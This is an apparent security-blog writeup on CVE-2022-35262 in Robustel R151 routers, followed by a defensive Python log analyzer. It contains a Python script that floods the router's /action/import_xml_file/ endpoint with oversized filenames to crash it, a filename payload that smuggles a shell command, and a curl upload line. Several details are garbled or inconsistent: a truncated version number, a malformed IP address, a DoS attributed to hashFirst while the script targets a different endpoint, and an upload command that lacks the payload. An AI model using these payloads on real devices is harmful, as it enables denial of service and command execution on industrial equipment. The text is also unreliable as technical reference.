Introduction:
CVE-2022-35262 is a serious vulnerability discovered in Robustel R151 routers (versions 3.1.16 and 3.3.). These industrial gateways are used worldwide for remote device management, making this a critical security issue. The vulnerability centers on the router’s web server, particularly the hashFirst function, and also affects the /action/import_xml_file/ API, exposing it to both denial of service (DoS) and command injection attacks.
What is the Robustel R151?
The Robustel R151 is a cellular router designed for industrial and IoT solutions. It’s widely deployed because of its reliable remote access and data transfer features. However, as with many embedded systems, security risks need close attention.
Denial of Service in hashFirst Functionality
Root Cause:
The hashFirst function inside Robustel's web server mishandles specially crafted HTTP requests. An attacker who sends such malformed requests can crash or freeze the device, resulting in a denial of service.
Network Access:
The attacker needs network access to the router’s management interface (usually on port 80/443).
Simple Proof-of-Concept (DoS)
Here’s a simple Python script example for educational purposes only (don’t attack devices you don’t own!):
```python
import requests

target_ip = "http://192.168..1"  # Replace with your target's IP address
endpoint = "/action/import_xml_file/"  # The vulnerable endpoint

# Malformed request to trigger the hashFirst vulnerability: an oversized filename field
data = {'filename': 'A' * 10000}
files = {'file': ('evil.xml', '<root></root>')}

for i in range(100):  # Send multiple requests
    try:
        response = requests.post(target_ip + endpoint, data=data, files=files, timeout=2)
        print(f"Sent request {i}, Status: {response.status_code}")
    except Exception as e:
        print(f"Error on request {i}: {e}")
```
This script floods the endpoint with oversized parameters, which can crash the device web server if it's unpatched.
Command Injection via /action/import_xml_file/ API
Description:
The /action/import_xml_file/ API endpoint suffers from a command injection flaw. By uploading a specially crafted XML file, an attacker can execute system commands with the privileges of the web server process.
Payload Example:
Suppose the web backend hands the submitted filename to a shell (via calls like os.system or popen) without sanitising it. Here's how an attacker might append a harmless demonstration command to the filename:
```
test.xml; ping -c 4 evil.example.com;
```

```sh
curl -F 'file=@malicious.xml' http://192.168..1/action/import_xml_file/
```
Mitigation
Patch:
Robustel has released patches; update to the latest firmware immediately.
See: Robustel Security Bulletin
Monitor Traffic:
Use IDS/IPS to spot and block anomalous or repeated requests to the /action/import_xml_file/ endpoint.
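As an added example (not code from the original article or from Robustel), a small Python log analyzer that implements the monitoring advice above. It assumes a constructed upload-audit log format, one line per POST carrying the submitted filename field, and flags filenames with shell metacharacters (the injection pattern in the payload example), oversized filenames (the DoS pattern in the PoC), and request bursts from one source.

```python
import re
from collections import defaultdict
ENDPOINT = "/action/import_xml_file/"
# Constructed upload-audit log format (not real device output), one line per POST.
LINE_RE = re.compile(r'^(\d+) src=(\S+) path=(\S+) filename="(.*)" bytes=\d+$')
def _line(ts, src, filename):
    return f'{ts} src={src} path={ENDPOINT} filename="{filename}" bytes=40'
# Benign upload, an injection-style filename, and a burst of oversized filenames.
SAMPLE_LINES = [_line(1666718101, "10.0.0.9", "config.xml"),
                _line(1666718102, "10.0.0.5", "test.xml; ping -c 4 evil.example.com;")]
SAMPLE_LINES += [_line(1666718200 + i, "10.0.0.7", "A" * 10000) for i in range(30)]

def filename_problem(name, max_len=255):
    """Reason string if the submitted filename looks hostile, else None."""
    if len(name) > max_len:
        return "oversized filename"
    if re.search(r"[;&|`$<>\n]", name):
        return "shell metacharacter in filename"
    if not re.fullmatch(r"[\w.-]+\.xml", name):
        return "filename outside allow-list"
    return None

def burst_sources(stamps_by_src, window_s=60, threshold=20):
    """Sources with >= threshold endpoint requests inside any window_s span."""
    hot = set()
    for src, stamps in stamps_by_src.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_s:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                hot.add(src)
                break
    return hot

def analyze(lines):
    """Sorted, de-duplicated (source, reason) alerts for the endpoint."""
    alerts, stamps_by_src = set(), defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group(3) != ENDPOINT:
            continue  # unparsable line or unrelated path
        ts, src, _, name = m.groups()
        stamps_by_src[src].append(int(ts))
        if reason := filename_problem(name):
            alerts.add((src, reason))
    alerts |= {(s, f"request burst to {ENDPOINT}") for s in burst_sources(stamps_by_src)}
    return sorted(alerts)
```

Feed real request records into `analyze` in the same shape and tune `threshold` and `max_len` to the legitimate upload traffic of your deployment.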
References
- NVD — CVE-2022-35262 Official Entry
- Robustel Security Advisories
- Full Disclosure Mailing List — Original Report
- Exploit Database
Conclusion
CVE-2022-35262 combines a denial of service with a severe command injection vulnerability in a common industrial router. With so many deployments in the field, prompt action is essential: if you own or manage Robustel R151s, update the firmware and limit network access as soon as possible.
Disclaimer:
This article is for educational awareness only. Never attempt exploitation without permission. Always patch and secure your devices.
*Stay safe, and always keep your embedded devices updated!*
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:56:00 UTC